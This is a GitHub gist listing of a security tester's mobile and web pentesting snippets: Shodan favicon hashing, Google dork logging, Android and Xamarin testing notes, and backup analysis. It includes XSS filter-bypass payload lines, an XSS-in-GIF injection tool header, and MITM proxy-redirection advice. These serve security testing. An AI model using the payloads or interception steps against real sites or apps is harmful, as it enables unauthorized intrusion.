Skip to content

Instantly share code, notes, and snippets.

View yehgdotnet's full-sized avatar

Aung Khant yehgdotnet

91 followers · 204 following
View GitHub Profile
@yehgdotnet
yehgdotnet / gist:fef2f953170179a6637d4f02348d023f
Created April 22, 2020 06:01
Android: secure AppStore Launch (aka protocol takover check)
# any apps that registers market:// could be part of user selection list
# only google play ID is allowed
# need to check for such application existence then launch the intent.
public static void secureAppStoreLaunch(Context context) {
// you can also use BuildConfig.APPLICATION_ID
String appId = context.getPackageName();
Intent rateIntent = new Intent(Intent.ACTION_VIEW,
Uri.parse("market://details?id=" + appId));
boolean marketFound = false;
@yehgdotnet
yehgdotnet / get-shodan-favicon-hash.py
Last active April 8, 2024 18:30
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@yehgdotnet
yehgdotnet / web-request.sh
Created April 20, 2020 06:09
Bash Web Requester
#!/usr/bin/env bash
################################################## ##############
# Bash Web Requester
# by Aung Khant, http://yehg.net
# License: GPL v2
#
# takes 2 arguments:
# one is a file with a list of URLs (url like http://site.com/test.asp)
# second is file with regexp compatible pattern that checks page content for matched keywords
@yehgdotnet
yehgdotnet / ghdb.user.js
Last active April 18, 2020 13:52
TamperMonkey: Log lists of domain in Google search results
// ==UserScript==
// @name Log lists of domain in Google search results
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match https://www.google.com/search?q=*
// @grant none
// ==/UserScript==
@yehgdotnet
yehgdotnet / xss2gif.py
Created December 1, 2019 12:41
XSS via valid gif
#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
#======= or it creates a JavaScript Payload as a GIF. ====================================================#
#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS IS NOT PEP3 FORMATTED
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
@yehgdotnet
yehgdotnet / gist:020f83a9ac0c1292efdbd39729614383
Created November 11, 2019 00:34
<</div>script</div>>alert()<</div>/script</div>>
<</p>script</p>>alert()<</p>/script</p>>
<</h1>script</h1>>alert()<</h1>/script</h1>>
@yehgdotnet
yehgdotnet / install_phpzip.md
Last active February 7, 2023 13:14
MAMP PRO for Mac OSX - Installing PHP ZIP extension

From Terminal

# install dependencies
brew install autoconf # required by pecl 
brew install libzip


# install zip extenion in your selected MAMP PHP version 
ls /Applications/MAMP/bin/php/
@yehgdotnet
yehgdotnet / gist:42b78037c7a5598ae3ec1b09b91387aa
Created November 2, 2019 02:53
Dealing with Xamarin
https://mobile-security.gitbook.io/mobile-security-testing-guide/general-mobile-app-testing-guide/0x04f-testing-network-communication
Dealing with Xamarin
Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.
When testing a Xamarin app and when you are trying to set the system proxy in the WiFi settings you won't be able to see any HTTP requests in your interception proxy, as the apps created by Xamarin do not use the local proxy settings of your phone. There are two ways to resolve this:
Add a default proxy to the app, by adding the following code in the OnCreate()or Main() method and re-create the app:WebRequest.DefaultWebProxy = new WebProxy("192.168.11.1", 8080); Use ettercap in order to get a man-in-the-middle position (MITM), see the section above about how to setup a MITM attack. When being MITM we only need to redirect port 443 to our interception proxy running on localhost. This can be d
@yehgdotnet
yehgdotnet / gist:397120706f5028c48924721bbbeee150
Created November 2, 2019 02:32
Mobile App Backup files analysis
Correct Backup Analysis Approach
Procedure for backup analysis
=============================
before-app-run
during app run
post-run
@yehgdotnet
yehgdotnet / gist:50271edb73db19d6e9246e5cc18e7a5f
Created November 2, 2019 01:15
Android cheatsheet
## Dumping SQLite
sqlite3 [db] ".dump"
#### Getting IP address:
in Android emulator, run netcfg or ip addr to know the ip address
#### Elevating Terminal app to Root Terminal
type: su